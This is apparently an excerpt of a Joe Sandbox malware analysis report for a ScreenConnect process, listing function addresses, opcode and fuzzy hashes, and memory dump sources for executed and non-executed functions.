                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6198890387df0dfeac7ccc4d17ce62788c22d2fefb66dfd6e3048520b370190a
                                                                                                                                                                                                                                          • Instruction ID: b5edbb9edbc0fd79f3a79ab720e3cb8510622c1de2b4b7c28706a636e52905e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6198890387df0dfeac7ccc4d17ce62788c22d2fefb66dfd6e3048520b370190a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9115E31E0898A8FDB99EF188050B6177A1FF68784B0544A9C44EDB287DA39E8468B80
                                                                                                                                                                                                                                          Function 00007FF849183F29 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cedc9e57bf9837b34474f42336ec3cd06a856b197ce9ba6cc48f64bdff06ccdd
                                                                                                                                                                                                                                          • Instruction ID: 932f8fb9977cc2f50085f3e2e03631820fa5605f6209bb6a563217f6ac0e3673
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cedc9e57bf9837b34474f42336ec3cd06a856b197ce9ba6cc48f64bdff06ccdd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E001D412A5CA860EFAA5B52C3D152F817A0DF952A1F4910B7DC4CC6196EA0C5CC703C2
                                                                                                                                                                                                                                          Function 00007FF849180D77 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 726357270637d76528c4ed6f75c341dfc50ae1b9c154cc2a8e61ca95b10f4c3f
                                                                                                                                                                                                                                          • Instruction ID: a3d6f68c95d7d310b82d62f5ca24ca468c52ebe8a62e69bf406d0e4e5d8c7d49
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726357270637d76528c4ed6f75c341dfc50ae1b9c154cc2a8e61ca95b10f4c3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11CCB284D8596ED718FB6CE4518F97360FF11398F1C9272D04D8A053EF15B8458E95
                                                                                                                                                                                                                                          Function 00007FF84918476E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b9fbe5b4dc8db46f2ab2628b735202c5f31f93b0f5bce3d9de272a6b9a80b8a2
                                                                                                                                                                                                                                          • Instruction ID: ac570251a61e2b834aa89780ad6a3a5bc2f51398f23a94e563767ca07f63d4ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9fbe5b4dc8db46f2ab2628b735202c5f31f93b0f5bce3d9de272a6b9a80b8a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B501F91990DA878FF7B4F72480603B566D2AF953C4F1A907AC40DC61D6DD2D9C869A40
                                                                                                                                                                                                                                          Function 00007FF849185EB4 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 13eb64c50aaf4eb972e86ed65eb4395be05eb47b7ac6b3f6a1f404d8bd7573e6
                                                                                                                                                                                                                                          • Instruction ID: c074f58a4cba11bc7b35b7cb1cb867d69afb818586203512f4842482ea71c969
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13eb64c50aaf4eb972e86ed65eb4395be05eb47b7ac6b3f6a1f404d8bd7573e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101A231E1CA878EFAF8ED0844816B423D5FB583C4F5540B4C44ED72CACE2CAC019A81
                                                                                                                                                                                                                                          Function 00007FF849185F3C Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 74d50a942488569d1b7ff7a02cb49a1af428a4904ac505f17f9bf418fb28d53f
                                                                                                                                                                                                                                          • Instruction ID: 1348dc458d7c1c5657373bfad1b41b12d73a7bd3bf27d3ec8fa7ccd81786b727
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74d50a942488569d1b7ff7a02cb49a1af428a4904ac505f17f9bf418fb28d53f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101FF30E5DA875DFEB9FE1440A1AB81291EF553C5F8544B8D84FCA1C7CE3CA805AA51
                                                                                                                                                                                                                                          Function 00007FF849180DF8 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ae226732b56fc8cdcd27f508067c20d5bfb58bcd9cbc6b86a5f72f9156e81f78
                                                                                                                                                                                                                                          • Instruction ID: 945d44f569607c52bee9726b5ff989cfa0e6e844177d1207aef492bf6a4a53b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae226732b56fc8cdcd27f508067c20d5bfb58bcd9cbc6b86a5f72f9156e81f78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EF0A07180894D9FCB19EA28E4548E6B760FF26304B0641A6E04DC7052DA21AD54CFC2
                                                                                                                                                                                                                                          Function 00007FF849184789 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5b84792d3b85a624d3c3f2ad849a6eb4b5c8a7cb50fd8d8ea5916627b1d6786b
                                                                                                                                                                                                                                          • Instruction ID: 80c4ecd18a26d546a7a023039c757baf4025386160bbab3b15bb1caf7f0f087a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b84792d3b85a624d3c3f2ad849a6eb4b5c8a7cb50fd8d8ea5916627b1d6786b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0E20590E7D30EE72A623518602707FA09F53280F0E40FBC099CA0D7EC4C48868712
                                                                                                                                                                                                                                          Function 00007FF849180601 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d58af4ecd7bf95eb0eb8fb30d62dba388c4a4779baa5a7ace90b7fe574ce0cf6
                                                                                                                                                                                                                                          • Instruction ID: 7cecef0614cdbff638e74b279cac5ffea62a243cd608fc24b011a52789262847
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d58af4ecd7bf95eb0eb8fb30d62dba388c4a4779baa5a7ace90b7fe574ce0cf6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E0D86150E7D40FD756EF3884988E13F50ED5321034901EBE4858F0B3E5148A49C751
                                                                                                                                                                                                                                          Function 00007FF849183B09 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 924660bcb0da36e6c3f5ad0b254056c07a816402a9e5c19a7381f77dcbf990bb
                                                                                                                                                                                                                                          • Instruction ID: 0b6e17cfaff797274adc576ad2cc300f8a58c9a8c69a1f426df01e38c9b6c79b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924660bcb0da36e6c3f5ad0b254056c07a816402a9e5c19a7381f77dcbf990bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF0E53540DACC8FCB82EB64D4648D57FB0FF56320B0501CBE048CB053E7209A59CB82
                                                                                                                                                                                                                                          Function 00007FF849185330 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6d683f3165337edba7af4594d20b7323dbff62861b2412c856a3e397d99e9fbd
                                                                                                                                                                                                                                          • Instruction ID: af5650c9447589c2d1879fb220b4f1c91f9abffa0dec18f7d4868750cb90fb1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d683f3165337edba7af4594d20b7323dbff62861b2412c856a3e397d99e9fbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E0DF31A0CA8D8FDB54EAA4A8002A573A0FB08308F0505A9E81DC3191D7B96A50CB02
                                                                                                                                                                                                                                          Function 00007FF8491847A0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 552ae35ba6e1dbaef25a825ea541d2b98c9a79956b649dc295e874716f931eb6
                                                                                                                                                                                                                                          • Instruction ID: c7b59613a2c53343b559a17503cb248999c002f8e341eed84c07fa3f20b76e11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 552ae35ba6e1dbaef25a825ea541d2b98c9a79956b649dc295e874716f931eb6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BE0C21594D9A30AFB7CB57578513B560C1AF493C1F0A907A941DC14C9ED5C9C825986
                                                                                                                                                                                                                                          Function 00007FF849182699 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6f58bb300433c6409340e1f60fe11e537ea8c65e8b6489bc235ab011fe8bc6cf
                                                                                                                                                                                                                                          • Instruction ID: 91129688c1616527163444bec82dc98d7fb1c34dfc2e6be23b6b0b0d29e71c74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f58bb300433c6409340e1f60fe11e537ea8c65e8b6489bc235ab011fe8bc6cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6E0DF60E1DECA8FE69AFA2444019797291FF64284F5845B9C84AA7187DE28A8058781
                                                                                                                                                                                                                                          Function 00007FF849182984 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c0236df8534d8ce9b9fa56c92c07cef367af125345209f86e0954ca5e1b27226
                                                                                                                                                                                                                                          • Instruction ID: d6d0d142a52482b0e9677ee64568a5b0ccac72f4e6322dc8a771fa549d92a03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0236df8534d8ce9b9fa56c92c07cef367af125345209f86e0954ca5e1b27226
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDC09210F0CA8A9FF265FB2544516BF11E27F8C2C4F618931E80EC2186CE3CA502A609

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00007FF849184428 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Xg I$`f I$`f I$h I
                                                                                                                                                                                                                                          • API String ID: 0-3707605622
                                                                                                                                                                                                                                          • Opcode ID: 825dcafa886678f16a100533e164a7f4d041870b70a6aad0cb58d1bfef5ce9a0
                                                                                                                                                                                                                                          • Instruction ID: 05a1237a6be8d59435e2aa2da534e96762aaba5eb87525ad63898da03745385e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 825dcafa886678f16a100533e164a7f4d041870b70a6aad0cb58d1bfef5ce9a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A715C31B1CB5A4FE778ED2C644517573C1EBA97E1B0502BED98AC3646ED29FC034A84